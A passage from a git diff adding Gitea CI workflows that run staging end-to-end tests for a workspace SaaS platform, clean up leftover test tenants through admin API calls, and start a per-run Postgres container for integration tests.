will catch it within ~45 min. Body: $(head -c 300 /tmp/canvas-cleanup.out 2>/dev/null)" + fi + exit 0 diff --git a/.gitea/workflows/e2e-staging-external.yml b/.gitea/workflows/e2e-staging-external.yml new file mode 100644 index 00000000..7479d8da --- /dev/null +++ b/.gitea/workflows/e2e-staging-external.yml @@ -0,0 +1,189 @@ +name: E2E Staging External Runtime + +# Ported from .github/workflows/e2e-staging-external.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Regression for the four/five workspaces.status=awaiting_agent transitions +# that silently failed in production for five days before migration 046 +# extended the workspace_status enum (see +# workspace-server/migrations/046_workspace_status_awaiting_agent.up.sql). +# +# Why this is its own workflow (not folded into e2e-staging-saas.yml): +# - The full-saas harness defaults to runtime=hermes, never exercises +# external-runtime. Adding an `external` parameter to that script +# would force every push to staging through both lifecycles in +# series, doubling the EC2 cold-start budget. +# - The external lifecycle has unique timing (REMOTE_LIVENESS_STALE_AFTER +# window, 90s default + sweep interval), which we wait through +# deliberately. Folding it into hermes would make the long path +# even longer. +# - It can run in parallel with the hermes E2E since both create +# fresh tenant orgs with distinct slug prefixes (`e2e-ext-...` vs +# `e2e-...`). +# +# Triggers: +# - Push to staging when any source affecting external runtime, +# hibernation, or the migration set changes. +# - PR review for the same set. +# - Manual workflow_dispatch. +# - Daily cron at 07:30 UTC (catches drift on quiet days; staggered +# 30 min after e2e-staging-saas.yml's 07:00 UTC cron). +# +# Concurrency: serialized so two staging pushes don't fight for the +# same EC2 quota window. cancel-in-progress=false so a half-rolled +# tenant always finishes its teardown. + +on: + push: + branches: [main] + paths: + - 'workspace-server/internal/handlers/workspace.go' + - 'workspace-server/internal/handlers/registry.go' + - 'workspace-server/internal/handlers/workspace_restart.go' + - 'workspace-server/internal/registry/healthsweep.go' + - 'workspace-server/internal/registry/liveness.go' + - 'workspace-server/migrations/**' + - 'workspace-server/internal/db/workspace_status_enum_drift_test.go' + - 'tests/e2e/test_staging_external_runtime.sh' + - '.gitea/workflows/e2e-staging-external.yml' + pull_request: + branches: [main] + paths: + - 'workspace-server/internal/handlers/workspace.go' + - 'workspace-server/internal/handlers/registry.go' + - 'workspace-server/internal/handlers/workspace_restart.go' + - 'workspace-server/internal/registry/healthsweep.go' + - 'workspace-server/internal/registry/liveness.go' + - 'workspace-server/migrations/**' + - 'workspace-server/internal/db/workspace_status_enum_drift_test.go' + - 'tests/e2e/test_staging_external_runtime.sh' + - '.gitea/workflows/e2e-staging-external.yml' + schedule: + - cron: '30 7 * * *' + +concurrency: + group: e2e-staging-external + cancel-in-progress: false + +permissions: + contents: read + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + e2e-staging-external: + name: E2E Staging External Runtime + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 25 + + env: + MOLECULE_CP_URL: https://staging-api.moleculesai.app + MOLECULE_ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + E2E_RUN_ID: "${{ github.run_id }}-${{ github.run_attempt }}" + E2E_KEEP_ORG: ${{ github.event.inputs.keep_org && '1' || '0' }} + E2E_STALE_WAIT_SECS: ${{ github.event.inputs.stale_wait_secs || '180' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify admin token present + run: | + if [ -z "$MOLECULE_ADMIN_TOKEN" ]; then + # Schedule + push triggers must hard-fail when the token is + # missing — silent skip would mask infra rot. Manual dispatch + # gets the same hard-fail; an operator running this on a fork + # without secrets configured needs to know up-front. + echo "::error::MOLECULE_STAGING_ADMIN_TOKEN secret not set (Railway staging CP_ADMIN_API_TOKEN)" + exit 2 + fi + echo "Admin token present ✓" + + - name: CP staging health preflight + run: | + code=$(curl -sS -o /dev/null -w "%{http_code}" --max-time 10 "$MOLECULE_CP_URL/health") + if [ "$code" != "200" ]; then + echo "::error::Staging CP unhealthy (got HTTP $code). Skipping — not a workspace bug." + exit 1 + fi + echo "Staging CP healthy ✓" + + - name: Run external-runtime E2E + id: e2e + run: bash tests/e2e/test_staging_external_runtime.sh + + # Mirror the e2e-staging-saas.yml safety net: if the runner is + # cancelled (e.g. concurrent staging push), the test script's + # EXIT trap may not fire, so we sweep e2e-ext-* slugs scoped to + # *this* run id. + - name: Teardown safety net (runs on cancel/failure) + if: always() + env: + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + run: | + set +e + orgs=$(curl -sS "$MOLECULE_CP_URL/cp/admin/orgs" \ + -H "Authorization: Bearer $ADMIN_TOKEN" 2>/dev/null \ + | python3 -c " + import json, sys, os, datetime + run_id = os.environ.get('GITHUB_RUN_ID', '') + d = json.load(sys.stdin) + # Scope STRICTLY to this run id (e2e-ext-YYYYMMDD--...) + # so concurrent runs and unrelated dev probes are not touched. + # Sweep today AND yesterday so a midnight-crossing run still + # cleans up its own slug. + today = datetime.date.today() + yesterday = today - datetime.timedelta(days=1) + dates = (today.strftime('%Y%m%d'), yesterday.strftime('%Y%m%d')) + if not run_id: + # Without a run id we cannot scope safely; bail rather + # than risk deleting unrelated tenants. + sys.exit(0) + prefixes = tuple(f'e2e-ext-{d}-{run_id}-' for d in dates) + for o in d.get('orgs', []): + s = o.get('slug', '') + if s.startswith(prefixes) and o.get('status') != 'purged': + print(s) + " 2>/dev/null) + if [ -n "$orgs" ]; then + echo "Safety-net sweep: deleting leftover orgs:" + echo "$orgs" + # Per-slug verified DELETE — see molecule-controlplane#420. + # `>/dev/null 2>&1` previously hid every failure; surface + # non-2xx as workflow warnings so the run page names what + # leaked. Sweeper catches the rest within ~45 min. + leaks=() + for slug in $orgs; do + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/external-cleanup.out -w "%{http_code}" \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/external-cleanup.code + set -e + code=$(cat /tmp/external-cleanup.code 2>/dev/null || echo "000") + if [ "$code" = "200" ] || [ "$code" = "204" ]; then + echo "[teardown] deleted $slug (HTTP $code)" + else + echo "::warning::external teardown for $slug returned HTTP $code — sweep-stale-e2e-orgs will catch it within ~45 min. Body: $(head -c 300 /tmp/external-cleanup.out 2>/dev/null)" + leaks+=("$slug") + fi + done + if [ ${#leaks[@]} -gt 0 ]; then + echo "::warning::external teardown left ${#leaks[@]} leak(s): ${leaks[*]}" + fi + else + echo "Safety-net sweep: no leftover orgs to clean." + fi diff --git a/.gitea/workflows/e2e-staging-saas.yml b/.gitea/workflows/e2e-staging-saas.yml new file mode 100644 index 00000000..f0e501f6 --- /dev/null +++ b/.gitea/workflows/e2e-staging-saas.yml @@ -0,0 +1,251 @@ +name: E2E Staging SaaS (full lifecycle) + +# Ported from .github/workflows/e2e-staging-saas.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Dedicated workflow that provisions a fresh staging org per run, exercises +# the full workspace lifecycle (register → heartbeat → A2A → delegation → +# HMA memory → activity → peers), then tears down and asserts leak-free. +# +# Why a separate workflow (not folded into ci.yml): +# - The run takes ~25-35 min (EC2 boot + cloudflared DNS + provision sweeps + +# agent bootstrap), way too slow for every PR. +# - Needs its own concurrency group so two pushes don't fight over the +# same staging org slug prefix. +# - Has its own required secrets (session cookie, admin token) that most +# PRs don't need to read. +# +# Triggers: +# - Push to main (regression guard) +# - workflow_dispatch (manual re-run from UI) +# - Nightly cron (catches drift even when no pushes land) +# - Changes to any provisioning-critical file under PR review (opt-in +# via the same paths watcher that e2e-api.yml uses) + +on: + # Trunk-based (Phase 3 of internal#81): main is the only branch. + # Previously this fired on staging push too because staging was a + # superset of main and ran the gate ahead of auto-promote; with no + # staging branch, main is where E2E gates the deploy. + push: + branches: [main] + paths: + - 'workspace-server/internal/handlers/registry.go' + - 'workspace-server/internal/handlers/workspace_provision.go' + - 'workspace-server/internal/handlers/a2a_proxy.go' + - 'workspace-server/internal/middleware/**' + - 'workspace-server/internal/provisioner/**' + - 'tests/e2e/test_staging_full_saas.sh' + - '.gitea/workflows/e2e-staging-saas.yml' + pull_request: + branches: [main] + paths: + - 'workspace-server/internal/handlers/registry.go' + - 'workspace-server/internal/handlers/workspace_provision.go' + - 'workspace-server/internal/handlers/a2a_proxy.go' + - 'workspace-server/internal/middleware/**' + - 'workspace-server/internal/provisioner/**' + - 'tests/e2e/test_staging_full_saas.sh' + - '.gitea/workflows/e2e-staging-saas.yml' + schedule: + # 07:00 UTC every day — catches AMI drift, WorkOS cert rotation, + # Cloudflare API regressions, etc. even on quiet days. + - cron: '0 7 * * *' + +# Serialize: staging has a finite per-hour org creation quota. Two pushes +# landing in quick succession should queue, not race. `cancel-in-progress: +# false` mirrors e2e-api.yml — GitHub would otherwise cancel the running +# teardown step and leave orphan EC2s. +concurrency: + group: e2e-staging-saas + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + e2e-staging-saas: + name: E2E Staging SaaS + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 45 + permissions: + contents: read + + env: + MOLECULE_CP_URL: https://staging-api.moleculesai.app + # Single admin-bearer secret drives provision + tenant-token + # retrieval + teardown. Configure in + # Settings → Secrets and variables → Actions → Repository secrets. + MOLECULE_ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + # MiniMax is the PRIMARY LLM auth path post-2026-05-04. Switched + # from hermes+OpenAI default after #2578 (the staging OpenAI key + # account went over quota and stayed dead for 36+ hours, taking + # the full-lifecycle E2E red on every provisioning-critical push). + # claude-code template's `minimax` provider routes + # ANTHROPIC_BASE_URL to api.minimax.io/anthropic and reads + # MINIMAX_API_KEY at boot — separate billing account so an + # OpenAI quota collapse no longer wedges the gate. Mirrors the + # canary-staging.yml + continuous-synth-e2e.yml migrations. + E2E_MINIMAX_API_KEY: ${{ secrets.MOLECULE_STAGING_MINIMAX_API_KEY }} + # Direct-Anthropic alternative for operators who don't want to + # set up a MiniMax account (priority below MiniMax — first + # non-empty wins in test_staging_full_saas.sh's secrets-injection + # block). See #2578 PR comment for the rationale. + E2E_ANTHROPIC_API_KEY: ${{ secrets.MOLECULE_STAGING_ANTHROPIC_API_KEY }} + # OpenAI fallback — kept wired so an operator-dispatched run with + # E2E_RUNTIME=hermes or =langgraph via workflow_dispatch can still + # exercise the OpenAI path. + E2E_OPENAI_API_KEY: ${{ secrets.MOLECULE_STAGING_OPENAI_KEY }} + E2E_RUNTIME: ${{ github.event.inputs.runtime || 'claude-code' }} + # Pin the model when running on the default claude-code path — + # the per-runtime default ("sonnet") routes to direct Anthropic + # and defeats the cost saving. Operators can override via the + # workflow_dispatch flow (no input wired here yet — runtime + # override is enough for ad-hoc). + E2E_MODEL_SLUG: ${{ github.event.inputs.runtime == 'hermes' && 'openai/gpt-4o' || github.event.inputs.runtime == 'langgraph' && 'openai:gpt-4o' || 'MiniMax-M2.7-highspeed' }} + E2E_RUN_ID: "${{ github.run_id }}-${{ github.run_attempt }}" + E2E_KEEP_ORG: ${{ github.event.inputs.keep_org && '1' || '0' }} + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify admin token present + run: | + if [ -z "$MOLECULE_ADMIN_TOKEN" ]; then + echo "::error::MOLECULE_STAGING_ADMIN_TOKEN secret not set (Railway staging CP_ADMIN_API_TOKEN)" + exit 2 + fi + echo "Admin token present ✓" + + - name: Verify LLM key present + run: | + # Per-runtime key check — claude-code uses MiniMax; hermes / + # langgraph (operator-dispatched only) use OpenAI. Hard-fail + # rather than soft-skip per #2578's lesson — empty key + # silently falls through to the wrong SECRETS_JSON branch and + # produces a confusing auth error 5 min later instead of the + # clean "secret missing" message at the top. + case "${E2E_RUNTIME}" in + claude-code) + # Either MiniMax OR direct-Anthropic works — first + # non-empty wins in the test script's secrets-injection + # priority chain. + if [ -n "${E2E_MINIMAX_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY" + required_secret_value="${E2E_MINIMAX_API_KEY}" + elif [ -n "${E2E_ANTHROPIC_API_KEY:-}" ]; then + required_secret_name="MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="${E2E_ANTHROPIC_API_KEY}" + else + required_secret_name="MOLECULE_STAGING_MINIMAX_API_KEY or MOLECULE_STAGING_ANTHROPIC_API_KEY" + required_secret_value="" + fi + ;; + langgraph|hermes) + required_secret_name="MOLECULE_STAGING_OPENAI_KEY" + required_secret_value="${E2E_OPENAI_API_KEY:-}" + ;; + *) + echo "::warning::Unknown E2E_RUNTIME='${E2E_RUNTIME}' — skipping LLM-key check" + required_secret_name="" + required_secret_value="present" + ;; + esac + if [ -n "$required_secret_name" ] && [ -z "$required_secret_value" ]; then + echo "::error::${required_secret_name} secret not set for runtime=${E2E_RUNTIME} — workspaces will fail at boot with 'No provider API key found'" + exit 2 + fi + echo "LLM key present ✓ (runtime=${E2E_RUNTIME}, key=${required_secret_name}, len=${#required_secret_value})" + + - name: CP staging health preflight + run: | + code=$(curl -sS -o /dev/null -w "%{http_code}" --max-time 10 "$MOLECULE_CP_URL/health") + if [ "$code" != "200" ]; then + echo "::error::Staging CP unhealthy (got HTTP $code). Skipping — not a workspace bug." + exit 1 + fi + echo "Staging CP healthy ✓" + + - name: Run full-lifecycle E2E + id: e2e + run: bash tests/e2e/test_staging_full_saas.sh + + # Belt-and-braces teardown: the test script itself installs a trap + # for EXIT/INT/TERM, but if the GH runner itself is cancelled (e.g. + # someone pushes a new commit and workflow concurrency is set to + # cancel), the trap may not fire. This `always()` step runs even on + # cancellation and attempts the delete a second time. The admin + # DELETE endpoint is idempotent so double-invoking is safe. + - name: Teardown safety net (runs on cancel/failure) + if: always() + env: + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + run: | + # Best-effort: find any e2e-YYYYMMDD-* orgs matching this run and + # nuke them. Catches the case where the script died before + # exporting its slug. + set +e + orgs=$(curl -sS "$MOLECULE_CP_URL/cp/admin/orgs" \ + -H "Authorization: Bearer $ADMIN_TOKEN" 2>/dev/null \ + | python3 -c " + import json, sys, os, datetime + run_id = os.environ.get('GITHUB_RUN_ID', '') + d = json.load(sys.stdin) + # ONLY sweep slugs from *this* CI run. Previously the filter was + # f'e2e-{today}-' which stomped on parallel CI runs AND any manual + # E2E probes a dev was running against staging (incident 2026-04-21 + # 15:02Z: this workflow's safety net deleted an unrelated manual + # run's tenant 1s after it hit 'running'). + # Sweep both today AND yesterday's UTC dates so a run that crosses + # midnight still matches its own slug — see the 2026-04-26→27 + # canvas-safety-net incident for the same bug class. + today = datetime.date.today() + yesterday = today - datetime.timedelta(days=1) + dates = (today.strftime('%Y%m%d'), yesterday.strftime('%Y%m%d')) + if run_id: + prefixes = tuple(f'e2e-{d}-{run_id}-' for d in dates) + else: + prefixes = tuple(f'e2e-{d}-' for d in dates) + candidates = [o['slug'] for o in d.get('orgs', []) + if any(o.get('slug','').startswith(p) for p in prefixes) + and o.get('instance_status') not in ('purged',)] + print('\n'.join(candidates)) + " 2>/dev/null) + # Per-slug verified DELETE (was `>/dev/null || true` — see + # molecule-controlplane#420). Surface non-2xx as a workflow + # warning naming the leaked slug; don't exit 1 (sweeper is + # the safety net within ~45 min). + leaks=() + for slug in $orgs; do + echo "Safety-net teardown: $slug" + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/saas-cleanup.out -w "%{http_code}" \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/saas-cleanup.code + set -e + code=$(cat /tmp/saas-cleanup.code 2>/dev/null || echo "000") + if [ "$code" = "200" ] || [ "$code" = "204" ]; then + echo "[teardown] deleted $slug (HTTP $code)" + else + echo "::warning::saas teardown for $slug returned HTTP $code — sweep-stale-e2e-orgs will catch it within ~45 min. Body: $(head -c 300 /tmp/saas-cleanup.out 2>/dev/null)" + leaks+=("$slug") + fi + done + if [ ${#leaks[@]} -gt 0 ]; then + echo "::warning::saas teardown left ${#leaks[@]} leak(s): ${leaks[*]}" + fi + exit 0 diff --git a/.gitea/workflows/e2e-staging-sanity.yml b/.gitea/workflows/e2e-staging-sanity.yml new file mode 100644 index 00000000..032924cd --- /dev/null +++ b/.gitea/workflows/e2e-staging-sanity.yml @@ -0,0 +1,157 @@ +name: E2E Staging Sanity (leak-detection self-check) + +# Ported from .github/workflows/e2e-staging-sanity.yml on 2026-05-11 per +# RFC internal#219 §1 sweep. +# +# Differences from the GitHub version: +# - Dropped `workflow_dispatch:` (Gitea 1.22.6 finicky on bare dispatch). +# - `actions/github-script@v9` issue-open block replaced with curl +# calls to the Gitea REST API (/api/v1/repos/.../issues|comments). +# - Workflow-level env.GITHUB_SERVER_URL set. +# - `continue-on-error: true` on the job (RFC §1 contract). +# +# Periodic assertion that the teardown safety nets in e2e-staging-saas +# and canary-staging actually work. Runs the E2E harness with +# E2E_INTENTIONAL_FAILURE=1, which poisons the tenant admin token after +# the org is provisioned. The workspace-provision step then fails, the +# script exits non-zero, and the EXIT trap + workflow always()-step +# must still tear down cleanly. + +on: + schedule: + - cron: '0 6 * * 1' + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +concurrency: + group: e2e-staging-sanity + cancel-in-progress: false + +permissions: + issues: write + contents: read + +jobs: + sanity: + name: Intentional-failure teardown sanity + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 20 + + env: + MOLECULE_CP_URL: https://staging-api.moleculesai.app + MOLECULE_ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + E2E_MODE: canary + E2E_RUNTIME: hermes + E2E_RUN_ID: "sanity-${{ github.run_id }}" + E2E_INTENTIONAL_FAILURE: "1" + + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - name: Verify admin token present + run: | + if [ -z "$MOLECULE_ADMIN_TOKEN" ]; then + echo "::error::MOLECULE_STAGING_ADMIN_TOKEN not set" + exit 2 + fi + + # Inverted assertion: the run MUST fail. If it passes, the + # E2E_INTENTIONAL_FAILURE path is broken. + - name: Run harness — expecting exit !=0 + id: harness + run: | + set +e + bash tests/e2e/test_staging_full_saas.sh + rc=$? + echo "harness_rc=$rc" >> "$GITHUB_OUTPUT" + if [ "$rc" = "1" ]; then + echo "OK Harness failed as expected (rc=1); teardown trap ran, leak-check passed" + exit 0 + elif [ "$rc" = "0" ]; then + echo "::error::Harness succeeded under E2E_INTENTIONAL_FAILURE=1 — the poisoning path is broken" + exit 1 + elif [ "$rc" = "4" ]; then + echo "::error::LEAK DETECTED (rc=4) — teardown failed to clean up the org. Safety net broken." + exit 4 + else + echo "::error::Unexpected rc=$rc — neither clean-failure nor leak. Investigate harness." + exit 1 + fi + + - name: Open issue if safety net is broken (Gitea API) + if: failure() + env: + GITEA_TOKEN: ${{ secrets.GITHUB_TOKEN }} + REPO: ${{ github.repository }} + SERVER_URL: ${{ env.GITHUB_SERVER_URL }} + RUN_ID: ${{ github.run_id }} + run: | + set -euo pipefail + API="${SERVER_URL%/}/api/v1" + TITLE="E2E teardown safety net broken" + RUN_URL="${SERVER_URL}/${REPO}/actions/runs/${RUN_ID}" + + BODY_JSON=$(jq -nc --arg t "$TITLE" --arg run "$RUN_URL" ' + {title: $t, + body: ("The weekly sanity run (E2E_INTENTIONAL_FAILURE=1) did not exit as expected. This means one of:\n - poisoning did not actually cause failure (test harness regression), OR\n - teardown left an orphan org (leak detection caught a real bug)\n\nRun: " + $run + "\n\nThis is higher priority than a canary failure — the whole E2E safety net cannot be trusted until this is resolved.")}') + + EXISTING=$(curl -fsS -H "Authorization: token $GITEA_TOKEN" \ + "${API}/repos/${REPO}/issues?state=open&type=issues&limit=50" \ + | jq -r --arg t "$TITLE" '.[] | select(.title==$t) | .number' | head -1) + + if [ -n "$EXISTING" ]; then + curl -fsS -X POST -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues/${EXISTING}/comments" \ + -d "$(jq -nc --arg run "$RUN_URL" '{body: ("Still broken. " + $run)}')" >/dev/null + echo "Commented on existing issue #${EXISTING}" + else + curl -fsS -X POST -H "Authorization: token $GITEA_TOKEN" -H "Content-Type: application/json" \ + "${API}/repos/${REPO}/issues" -d "$BODY_JSON" >/dev/null + echo "Filed new issue" + fi + + # Belt-and-braces: if teardown left anything behind, nuke it here + # so we don't bleed staging quota. + - name: Teardown safety net + if: always() + env: + ADMIN_TOKEN: ${{ secrets.MOLECULE_STAGING_ADMIN_TOKEN }} + run: | + set +e + orgs=$(curl -sS "$MOLECULE_CP_URL/cp/admin/orgs" \ + -H "Authorization: Bearer $ADMIN_TOKEN" 2>/dev/null \ + | python3 -c " + import json, sys + d = json.load(sys.stdin) + today = __import__('datetime').date.today().strftime('%Y%m%d') + candidates = [o['slug'] for o in d.get('orgs', []) + if o.get('slug','').startswith(f'e2e-canary-{today}-sanity-') + and o.get('status') not in ('purged',)] + print('\n'.join(candidates)) + " 2>/dev/null) + leaks=() + for slug in $orgs; do + # Tempfile-routed -w + set +e/-e prevents curl-exit-code + # pollution of the captured status (lint-curl-status-capture.yml). + set +e + curl -sS -o /tmp/sanity-cleanup.out -w "%{http_code}" \ + -X DELETE "$MOLECULE_CP_URL/cp/admin/tenants/$slug" \ + -H "Authorization: Bearer $ADMIN_TOKEN" \ + -H "Content-Type: application/json" \ + -d "{\"confirm\":\"$slug\"}" >/tmp/sanity-cleanup.code + set -e + code=$(cat /tmp/sanity-cleanup.code 2>/dev/null || echo "000") + if [ "$code" = "200" ] || [ "$code" = "204" ]; then + echo "[teardown] deleted $slug (HTTP $code)" + else + echo "::warning::sanity teardown for $slug returned HTTP $code — sweep-stale-e2e-orgs will catch it within ~45 min. Body: $(head -c 300 /tmp/sanity-cleanup.out 2>/dev/null)" + leaks+=("$slug") + fi + done + if [ ${#leaks[@]} -gt 0 ]; then + echo "::warning::sanity teardown left ${#leaks[@]} leak(s): ${leaks[*]}" + fi + exit 0 diff --git a/.gitea/workflows/handlers-postgres-integration.yml b/.gitea/workflows/handlers-postgres-integration.yml new file mode 100644 index 00000000..97eb261b --- /dev/null +++ b/.gitea/workflows/handlers-postgres-integration.yml @@ -0,0 +1,282 @@ +name: Handlers Postgres Integration + +# Ported from .github/workflows/handlers-postgres-integration.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Real-Postgres integration tests for workspace-server/internal/handlers/. +# Triggered on every PR/push that touches the handlers package. +# +# Why this workflow exists +# ------------------------ +# Strict-sqlmock unit tests pin which SQL statements fire — they're fast +# and let us iterate without a DB. But sqlmock CANNOT detect bugs that +# depend on the row state AFTER the SQL runs. The result_preview-lost +# bug shipped to staging in PR #2854 because every unit test was +# satisfied with "an UPDATE statement fired" — none verified the row's +# preview field actually landed. The local-postgres E2E that retrofit +# self-review caught it took 2 minutes to set up and would have caught +# the bug at PR-time. +# +# Why this workflow does NOT use `services: postgres:` (Class B fix) +# ------------------------------------------------------------------ +# Our act_runner config has `container.network: host` (operator host +# /opt/molecule/runners/config.yaml), which act_runner applies to BOTH +# the job container AND every service container. With host-net, two +# concurrent runs of this workflow both try to bind 0.0.0.0:5432 — the +# second postgres FATALs with `could not create any TCP/IP sockets: +# Address in use`, and Docker auto-removes it (act_runner sets +# AutoRemove:true on service containers). By the time the migrations +# step runs `psql`, the postgres container is gone, hence +# `Connection refused` then `failed to remove container: No such +# container` at cleanup time. +# +# Per-job `container.network` override is silently ignored by +# act_runner — `--network and --net in the options will be ignored.` +# appears in the runner log. Documented constraint. +# +# So we sidestep `services:` entirely. The job container still uses +# host-net (inherited from runner config; required for cache server +# discovery on the bridge IP 172.18.0.17:42631). We launch a sibling +# postgres on the existing `molecule-core-net` bridge with a +# UNIQUE name per run — `pg-handlers-${RUN_ID}-${RUN_ATTEMPT}` — and +# read its bridge IP via `docker inspect`. A host-net job container +# can reach a bridge-net container directly via the bridge IP (verified +# manually on operator host 2026-05-08). +# +# Trade-offs vs. the original `services:` shape: +# + No host-port collision; N parallel runs share the bridge cleanly +# + `if: always()` cleanup runs even on test-step failure +# - One more step in the workflow (+~3 lines) +# - Requires `molecule-core-net` to exist on the operator host +# (it does; declared in docker-compose.yml + docker-compose.infra.yml) +# +# Class B Hongming-owned CICD red sweep, 2026-05-08. +# +# Cost: ~30s job (postgres pull from cache + go build + 4 tests). + +on: + push: + branches: [main, staging] + pull_request: + branches: [main, staging] +concurrency: + group: handlers-pg-integ-${{ github.event.pull_request.head.sha || github.sha }} + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + detect-changes: + name: detect-changes + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + outputs: + handlers: ${{ steps.filter.outputs.handlers }} + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + fetch-depth: 0 + - id: filter + # Inline replacement for dorny/paths-filter — see e2e-api.yml. + run: | + BASE="${GITHUB_BASE_REF:-${{ github.event.before }}}" + if [ "${{ github.event_name }}" = "pull_request" ] && [ -n "${{ github.event.pull_request.base.sha }}" ]; then + BASE="${{ github.event.pull_request.base.sha }}" + fi + if [ -z "$BASE" ] || echo "$BASE" | grep -qE '^0+$'; then + echo "handlers=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + if ! git cat-file -e "$BASE" 2>/dev/null; then + git fetch --depth=1 origin "$BASE" 2>/dev/null || true + fi + if ! git cat-file -e "$BASE" 2>/dev/null; then + echo "handlers=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + CHANGED=$(git diff --name-only "$BASE" HEAD) + if echo "$CHANGED" | grep -qE '^(workspace-server/internal/handlers/|workspace-server/internal/wsauth/|workspace-server/migrations/|\.gitea/workflows/handlers-postgres-integration\.yml$)'; then + echo "handlers=true" >> "$GITHUB_OUTPUT" + else + echo "handlers=false" >> "$GITHUB_OUTPUT" + fi + + # Single-job-with-per-step-if pattern: always runs to satisfy the + # required-check name on branch protection; real work gates on the + # paths filter. See ci.yml's Platform (Go) for the same shape. + integration: + name: Handlers Postgres Integration + needs: detect-changes + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + env: + # Unique name per run so concurrent jobs don't collide on the + # bridge network. ${RUN_ID}-${RUN_ATTEMPT} is unique even across + # workflow_dispatch reruns of the same run_id. + PG_NAME: pg-handlers-${{ github.run_id }}-${{ github.run_attempt }} + # Bridge network already exists on the operator host (declared + # in docker-compose.yml + docker-compose.infra.yml). + PG_NETWORK: molecule-core-net + defaults: + run: + working-directory: workspace-server + steps: + - if: needs.detect-changes.outputs.handlers != 'true' + working-directory: . + run: echo "No handlers/migrations changes — skipping; this job always runs to satisfy the required-check name." + + - if: needs.detect-changes.outputs.handlers == 'true' + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - if: needs.detect-changes.outputs.handlers == 'true' + uses: actions/setup-go@40f1582b2485089dde7abd97c1529aa768e1baff # v5 + with: + go-version: 'stable' + + - if: needs.detect-changes.outputs.handlers == 'true' + name: Start sibling Postgres on bridge network + working-directory: . + run: | + # Sanity: the bridge network must exist on the operator host. + # Hard-fail loud if it doesn't — easier to spot than a silent + # auto-create that diverges from the rest of the stack. + if ! docker network inspect "${PG_NETWORK}" >/dev/null 2>&1; then + echo "::error::Bridge network '${PG_NETWORK}' missing on operator host. Re-run docker-compose.infra.yml or check ops handbook." + exit 1 + fi + + # If a stale container with the same name exists (rerun on + # the same run_id), wipe it first. + docker rm -f "${PG_NAME}" >/dev/null 2>&1 || true + + docker run -d \ + --name "${PG_NAME}" \ + --network "${PG_NETWORK}" \ + --health-cmd "pg_isready -U postgres" \ + --health-interval 5s \ + --health-timeout 5s \ + --health-retries 10 \ + -e POSTGRES_PASSWORD=test \ + -e 